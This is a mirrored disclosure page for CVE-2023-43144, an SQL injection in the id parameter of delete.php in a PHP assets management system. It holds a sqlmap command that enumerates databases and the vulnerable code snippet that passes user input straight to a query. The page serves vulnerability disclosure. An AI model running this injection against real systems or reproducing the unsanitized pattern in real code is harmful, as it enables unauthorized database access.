CVE-2023-43144 PoC — Projectworldsl Assets-management-system-in-php SQL注入漏洞

Source

https://github.com/Pegasus0xx/CVE-2023-43144

Associated Vulnerability

Title:Projectworldsl Assets-management-system-in-php SQL注入漏洞 (CVE-2023-43144)
Description:Assets-management-system-in-php是projectworlds个人开发者的一个 PHP 资产管理系统。 Projectworldsl Assets-management-system-in-php 1.0版本存在安全漏洞，该漏洞源于文件delete.php的参数id存在SQL注入漏洞。

Description

Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php

Readme

# CVE-2023-43144

> Description

Assets Management System 1.0 is vulnerable to SQL injection via the `id` parameter in `delete.php`

> PoC

```bash
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch
```

![alt text](https://github.com/Pegasus0xx/CVE-2023-43144/blob/main/PoC.png?raw=true)

> Code review (delete.php)

```php
 <?php include 'core/init.php'; 
  
 $id = $_GET['id']; 
 delete_data($con,$id); 
 header('location:home.php'); 
```

There is no validation or sanitization of the `$id` variable. It means that any value provided by a user as the id parameter, will be directly used in the SQL query

File Snapshot


 [4.0K]  /data/pocs/38aacb79278f4cafe4758398521a32b17c5cebad
├── [200K]  PoC.png
└── [ 658]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!